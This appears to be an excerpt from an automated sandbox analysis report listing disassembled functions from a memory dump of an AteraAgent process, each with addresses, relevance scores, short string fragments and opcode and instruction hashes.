                                                                                                                                                                                                                                                                            • Instruction ID: b47961f19a6ec74962d8d395e2ea723294a96b4091cd9c13b619449ec588040c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6c02689b9e5034df8f15207e5379186ec08c799a80fea5f6a42d02853c622a8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1942F77280E7C69FE3A68B2484556A53BE1EF97350F0945FDC48D8B1B3DA28684EC7C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47CA30 Relevance: 4.8, Strings: 3, Instructions: 1076COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$63$63
                                                                                                                                                                                                                                                                            • API String ID: 0-1694104320
                                                                                                                                                                                                                                                                            • Opcode ID: 766ac9cdfe5d85d6e8bfe02a6ef817258864f70699cae47a483f7fba0bc95022
                                                                                                                                                                                                                                                                            • Instruction ID: f6491eba25fcfea8969c9a0ed624b5a6f9208b9a68c8a90754dd1dd5bfc094c7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 766ac9cdfe5d85d6e8bfe02a6ef817258864f70699cae47a483f7fba0bc95022
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7972B33161DA498FEB98EF1CC855AB93BE2FF99344F0441B9E44DD72A2CE24EC458781
                                                                                                                                                                                                                                                                            Function 00007FFAAB464C41 Relevance: 4.2, Strings: 3, Instructions: 403COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0D=$0D=$`m=
                                                                                                                                                                                                                                                                            • API String ID: 0-2166694842
                                                                                                                                                                                                                                                                            • Opcode ID: 50a340d0f3aef90970db4b5e3b1528ee62db11865d60cce30c0ae50078254ca9
                                                                                                                                                                                                                                                                            • Instruction ID: f2a875eef9e4b2c6d41641355172801435906a5ff25bc224746e38dce87ad3f6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50a340d0f3aef90970db4b5e3b1528ee62db11865d60cce30c0ae50078254ca9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28D1A17090A68DCFEB99DB28C4646ADBBF1EF57340F5441BAD00DDB2A2CA345C49CB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB483870 Relevance: 3.1, Strings: 2, Instructions: 645COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3$J_H
                                                                                                                                                                                                                                                                            • API String ID: 0-991632379
                                                                                                                                                                                                                                                                            • Opcode ID: 54dea514fccf07e9da6d4a7f344222ce33f6e0ef5eae694fa5d864ff97823582
                                                                                                                                                                                                                                                                            • Instruction ID: 3a94672f5dca0eee9fa3acb94a8ebe20c0cc883f6650c1a217e4dc6253be0afc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54dea514fccf07e9da6d4a7f344222ce33f6e0ef5eae694fa5d864ff97823582
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47123921A0EB468FE766977884552797BE1FF47380F15C1BAD09EC71E3CD28684A83D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C910 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c9f1fba6451ea6e63e0fce669d2f2a9cd5ea3b1c416af6287980f82304e9058c
                                                                                                                                                                                                                                                                            • Instruction ID: 21736b042a57a9fa122737738d3daf146d3040562aec93ebf92183a0e34ef767
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f1fba6451ea6e63e0fce669d2f2a9cd5ea3b1c416af6287980f82304e9058c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11C1A17161DE4D8FDF94EF2CC445AAA3BE1FF69351B04417AE40DD32A2CA24E855C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB481BEE Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a4156fb945bc5fcdedabb4892aa16bbccf1521f8de257e4a3e8c611c9f86e18c
                                                                                                                                                                                                                                                                            • Instruction ID: 71c3ae30fb1c39bf743dba4e5c8f9e49d453725682b6a8afe572a43aaaab4c06
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4156fb945bc5fcdedabb4892aa16bbccf1521f8de257e4a3e8c611c9f86e18c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D1873151DB85CFD759DB28C040AA6BBE1FF66300F14C6AED49EC72A2DA34E449CB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB46AB08 Relevance: 8.1, Strings: 6, Instructions: 592COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$ }5$0p=$P~5$b43$t=
                                                                                                                                                                                                                                                                            • API String ID: 0-326184855
                                                                                                                                                                                                                                                                            • Opcode ID: 0760808dcbc6e4f7d44b03f8521f102631ed1945d8ddc6a0dc218b12ca2e706f
                                                                                                                                                                                                                                                                            • Instruction ID: af5da89ad82d553b697ca80a988e0a6653617fab33dc3484b913561cd9dcaf23
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0760808dcbc6e4f7d44b03f8521f102631ed1945d8ddc6a0dc218b12ca2e706f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EF16C22B1DE4A8FE795EB2CD86667477D1EF9A340F0481BAD44DC72A3DD15AC0A83C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46DE20 Relevance: 4.3, Strings: 3, Instructions: 548COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$J93$pl=
                                                                                                                                                                                                                                                                            • API String ID: 0-2556505275
                                                                                                                                                                                                                                                                            • Opcode ID: 6388469a66844a3132905bf212dae61be30690cfffbac6ea66c9cd5ceb5617b1
                                                                                                                                                                                                                                                                            • Instruction ID: 254730f5442b5ec6fbf35cf16e4e7c6b216025959965c31f8577148845a62ddd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6388469a66844a3132905bf212dae61be30690cfffbac6ea66c9cd5ceb5617b1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F12871A1DA498FE759EB2CC4655797BE1EF9A340F0441BEE08DC72A3DD24AC068782
                                                                                                                                                                                                                                                                            Function 00007FFAAB463466 Relevance: 4.1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (3<$X6$X6
                                                                                                                                                                                                                                                                            • API String ID: 0-3309198198
                                                                                                                                                                                                                                                                            • Opcode ID: 41ab30002591710d5941f3d0d89768ae8ab7d2e2a2c299bd2f54d806d190835b
                                                                                                                                                                                                                                                                            • Instruction ID: f6ee50165cf2a9eb4911e833d2a59aee3882624b67b65476108bb96dfe5ad244
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41ab30002591710d5941f3d0d89768ae8ab7d2e2a2c299bd2f54d806d190835b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43D1617091AA898FE785EB3CC855A68BBF1EF57344F6401FAC04CDB2A3C9245846CB61
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C33D Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8h5$8h5$^
                                                                                                                                                                                                                                                                            • API String ID: 0-2406599437
                                                                                                                                                                                                                                                                            • Opcode ID: ddcf8cb80c8b94c42f654971d7958391c62c29e31562eef6738e814289ddd477
                                                                                                                                                                                                                                                                            • Instruction ID: f09484f937dcc6f6bab6cc35bd2b4e8fa7d43f6bb6cdfbc951d94ebc71f4ffe6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddcf8cb80c8b94c42f654971d7958391c62c29e31562eef6738e814289ddd477
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3351E45794E6C29BE316577CE8A90A47FA0EF53265B0981F7C0CC8A0A3DA096489C7D1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C9C0 Relevance: 3.3, Strings: 2, Instructions: 849COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$`o=
                                                                                                                                                                                                                                                                            • API String ID: 0-3520669709
                                                                                                                                                                                                                                                                            • Opcode ID: ab435fecfeb0a2873e0a8b27c65ececeed899bc59bf26f2d8ac6824001104ae1
                                                                                                                                                                                                                                                                            • Instruction ID: 779b955a0dbd533681a5041ca5f4655c1e23e5cbb2519f3253380c3c0c58d025
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab435fecfeb0a2873e0a8b27c65ececeed899bc59bf26f2d8ac6824001104ae1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75523E30A1DA4DCFDF98EB1CC494AA977E2FFA9344F1441B9E44DD72A2CA24E845C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB46CFC8 Relevance: 3.2, Strings: 2, Instructions: 687COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3$/3
                                                                                                                                                                                                                                                                            • API String ID: 0-3180611485
                                                                                                                                                                                                                                                                            • Opcode ID: eeb5df040f522bc575a25c3813664060ff2061ce26ec8a10943cc06469ff8c87
                                                                                                                                                                                                                                                                            • Instruction ID: 13b0bed587f0f169c663e33c72d924e5f22df80ef357b84d10e44210055d9d28
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eeb5df040f522bc575a25c3813664060ff2061ce26ec8a10943cc06469ff8c87
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2722F330A1D7858FD758DB1C848553A77E1EF96340F24857DE08EC32A2DE28EC86C782
                                                                                                                                                                                                                                                                            Function 00007FFAAB4686DA Relevance: 2.8, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5$p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-667447757
                                                                                                                                                                                                                                                                            • Opcode ID: a3bfa2de9a08b6f2e10c0213832fe8e3eacf42981e7dafbd10c8979406fe375b
                                                                                                                                                                                                                                                                            • Instruction ID: 7c0931790cb1a048d49bd8f1a69bd4400dc4bd59e5e7a64e57671f5dbc343639
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3bfa2de9a08b6f2e10c0213832fe8e3eacf42981e7dafbd10c8979406fe375b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFB11471D0A6498FE794DB68C8657E8BFF1EF56350F0442BAD04DD72A2CB38184ACB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB474894 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: b43$b43
                                                                                                                                                                                                                                                                            • API String ID: 0-539240600
                                                                                                                                                                                                                                                                            • Opcode ID: 82cb5618063f25420a4c9d10fe0a8dc757f9aa765d6d60a2dd18cb4b4abcbd2c
                                                                                                                                                                                                                                                                            • Instruction ID: c3589171caf97fbc2a8430efe9fb4e52334bff24f593c15889af24dfd58978c6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82cb5618063f25420a4c9d10fe0a8dc757f9aa765d6d60a2dd18cb4b4abcbd2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D913671A1DB4A8FD768DF28C4855B677E0FF96350B14867ED08EC3196DE28E886C780
                                                                                                                                                                                                                                                                            Function 00007FFAAB469EF1 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0X=$:
                                                                                                                                                                                                                                                                            • API String ID: 0-2276393443
                                                                                                                                                                                                                                                                            • Opcode ID: 8acc9780386177f0d3aca649e9d402160aa7af0eb859f2e61558dbf8a5022f53
                                                                                                                                                                                                                                                                            • Instruction ID: ebdff3f92bb00b2848fb7d75e4e7af75ddcb80ab094566eb407f5d15c4021e53
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8acc9780386177f0d3aca649e9d402160aa7af0eb859f2e61558dbf8a5022f53
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9410517B095965FD745B7BDE8595F83BE0DF8A2A5B0940F7E48CCB0A3DC08988A83D1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46CDFB Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: X`=$vL_^
                                                                                                                                                                                                                                                                            • API String ID: 0-2746678633
                                                                                                                                                                                                                                                                            • Opcode ID: 8b876024aac51eed4da0de8ab3b6d7bc26a655a8da00973e126d5f51a74d5aab
                                                                                                                                                                                                                                                                            • Instruction ID: 34d770b243d7fe39a561befff24f0a33e82b295df0849b376afeb86156d90615
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b876024aac51eed4da0de8ab3b6d7bc26a655a8da00973e126d5f51a74d5aab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A410671B1DA489FE758DB6CE82A5797BE1EF9A391B0441BBE04DC72A3CD205C0687C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47D304 Relevance: 1.8, Strings: 1, Instructions: 581COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: dK_H
                                                                                                                                                                                                                                                                            • API String ID: 0-2901103952
                                                                                                                                                                                                                                                                            • Opcode ID: ffb1e3b8e39689cca489671cf106d7c0ae2d948da5eae5963a5550ae25d4ce93
                                                                                                                                                                                                                                                                            • Instruction ID: f89d6eec1fdec4bf796d9bc5ad539ab347fd05432207e6debd522d1dc59a394f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffb1e3b8e39689cca489671cf106d7c0ae2d948da5eae5963a5550ae25d4ce93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C02F57061DE498FD759DB2CC4546B97BE1FF9A300F14826ED48EC72A6CE24A886C7C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47724B Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Hk6
                                                                                                                                                                                                                                                                            • API String ID: 0-3416695518
                                                                                                                                                                                                                                                                            • Opcode ID: eb2b997b220cbc29215413aa0d999651fa61b1d0218a221c6b0e9b8929272fc3
                                                                                                                                                                                                                                                                            • Instruction ID: 62bae4de32fb4e7bf87ab40e7247a0d9d8c4ec8f495274df12094e72eef3b390
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb2b997b220cbc29215413aa0d999651fa61b1d0218a221c6b0e9b8929272fc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E11670A1DB898FE754EB2CC055A69B7E2FF96340F50857DE08DC72A3CE24A845C782
                                                                                                                                                                                                                                                                            Function 00007FFAAB473B18 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                            • Opcode ID: c96ee630fea068326bb3823f13d8f756ebde6530fcbea49ffdbb5ebb087508ac
                                                                                                                                                                                                                                                                            • Instruction ID: 7d534a84e6800cd21ee49a2941094e13c27996bb08da423821250fc09684ad10
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96ee630fea068326bb3823f13d8f756ebde6530fcbea49ffdbb5ebb087508ac
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BD1013161CB498BD728EB1CD4415B5B7E1FF96354B148ABDD08EC32A6DA25B882CBC1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47447A Relevance: 1.7, Strings: 1, Instructions: 414COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                            • Opcode ID: bffe4d47edd1c4c2909dd245eab49a2bc215b8f55a4773f91f58b6a63860f215
                                                                                                                                                                                                                                                                            • Instruction ID: 13a052f87040ec24d32d0902344309e301cdac92586b37b1eaa4d0fc5f03f2ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bffe4d47edd1c4c2909dd245eab49a2bc215b8f55a4773f91f58b6a63860f215
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18C12330A1DB898FE769DB18C440535B7E1FF96380B1486BDD08EC31A6DA25F886C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB4703C5 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                            • Opcode ID: e3c86ab439e271cb652f5a715538c0e531635d43ac60dab2bcbf93a2cab1c2a3
                                                                                                                                                                                                                                                                            • Instruction ID: ebd34910c694ae59ce6a9b300bc7cafb3925c8397006ccce5a5ba109e761ad47
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3c86ab439e271cb652f5a715538c0e531635d43ac60dab2bcbf93a2cab1c2a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76B1CC7061DB098FE728DB1CD491535B7E1FF99350B248A7DD08E836A6DA35F882CB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB47CF10 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8h5
                                                                                                                                                                                                                                                                            • API String ID: 0-2314399704
                                                                                                                                                                                                                                                                            • Opcode ID: 41c0121ea9541b8e167d2f12d2ff17b0366cc72b4f9e47baed80cb80f89f3aaa
                                                                                                                                                                                                                                                                            • Instruction ID: 02fb0e2d6570c060ee4e648210e112876a3c4371976499f907c3d03b52d9d5c4
